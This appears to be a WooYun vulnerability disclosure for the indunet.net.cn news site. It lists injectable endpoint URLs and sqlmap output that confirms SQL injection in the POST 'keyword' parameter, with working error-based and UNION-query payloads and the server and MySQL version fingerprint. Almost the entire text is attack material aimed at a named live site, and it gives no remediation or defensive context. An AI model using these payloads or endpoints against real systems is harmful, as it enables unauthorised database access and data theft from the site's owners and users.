WooYun.org

http://www.indunet.net.cn/news/data!gethyArticlebylid1.action?gotourl=/research/researchlist.jsp (POST)
hid=5&keyword=111&Submit=%CB%D1%CB%F7

http://www.indunet.net.cn/news/data!getArticlebyLid.action?hid=29&lid=643&gotourl=/business/xwinfolist.jsp

http://www.indunet.net.cn/news/data!SynthesisSearch.action?gotourl=/news/searchlist.jsp (POST)
title=12&pname=&ind2=&keyword=12&type=1

sqlmap identified the following injection points with a total of 946 HTTP(s) requests:
---
Place: POST
Parameter: keyword
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: title=12&pname=&ind2=&keyword=12' AND (SELECT 4952 FROM(SELECT COUNT(*),CONCAT(0x7165746c71,(SELECT (CASE WHEN (4952=4952) THEN 1 ELSE 0 END)),0x7166667271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Tgju'='Tgju&type=1
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: title=12&pname=&ind2=&keyword=12' UNION ALL SELECT CONCAT(0x7165746c71,0x6b4d77634d7778486f76,0x7166667271)#&type=1
---
web application technology: Servlet 2.4, Tomcat 4.2.3.
back-end DBMS: MySQL 5.0